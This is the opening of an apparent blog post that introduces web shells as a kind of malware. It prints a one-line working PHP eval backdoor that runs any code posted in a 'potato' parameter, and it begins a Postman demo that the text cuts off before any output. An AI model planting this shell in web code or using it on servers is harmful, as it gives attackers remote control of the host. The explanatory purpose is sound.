Member-only story
Of the various pieces of malware i’ve analyzed, I still find web shells to be the most fascinating. While this not a new topic, i’ve been asked by others to do a write up on web shells, so here it is ;).
For those new to web shells, think of this type of malware as code designed to be executed by the web server — instead of writing a backdoor in C, for example, an attacker can write malicious PHP and upload the code directly to a vulnerable web server. Web shells span across many different languages and server types.
Web shells 101
To better understand web shells, let’s take a look at a simple eval web shell below:
<?php ${${eval($_POST[potato])}};?>;
This is a very simple yet dangerous eval web shell that I still see in use to this day in targeted engagements (.asp or .aspx equivalent eval web shell on Windows Internet Information Services). This PHP web shell will take any arbitrary PHP code assigned to the POST variable potato and evaluate it. Let see how this would work in the real world. Let’s say an attacker has found a way to create the PHP file a.php inside your web directory.
Once the php file is created, we can begin issuing commands to the web shell. Lets see what happens when we issue a simple ipconfig. To issue this POST request, we’ll be using a tool called Postman.
